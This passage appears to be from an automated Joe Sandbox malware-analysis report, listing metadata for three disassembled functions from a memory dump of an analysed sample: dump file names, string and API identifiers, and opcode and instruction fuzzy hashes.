                              • Part of subcall function 6CCC914B: __EH_prolog.LIBCMT ref: 6CCC9150
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J
                            • API String ID: 3519838083-2882003284
                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction ID: b9d51e9df76cbca80d406eb84b83401813892225c9fb111f0d0e21db6858153d
                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction Fuzzy Hash: D00105B1900B50CFC325CF55C5A428AFBE0BB15308F90C95EC0A657B50E7B8A508CB68
                            Function 6CCE4E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction ID: 495c65ae17fc31ff2f5c06e9509f1dd22e718ab3de5301895c4bdea5c6591a3b
                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction Fuzzy Hash: 7B51A1719052099FCF01CF95D840BDFBBB1BF1A32CF10442AE81667A90FB75A949CB51
                            Function 6CD04F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: (?K$8?K$H?K$CK
                            • API String ID: 0-3450752836
                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction ID: acb7d17cc4bb1bfbc4c9484ee25437ae1d071cd7f64cc98271883d5199a39e9e
                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction Fuzzy Hash: 37F017B06017009EC3608F06D54869BBBF4EB4270AF50C91EE19A9BA40D3B8A5088FB8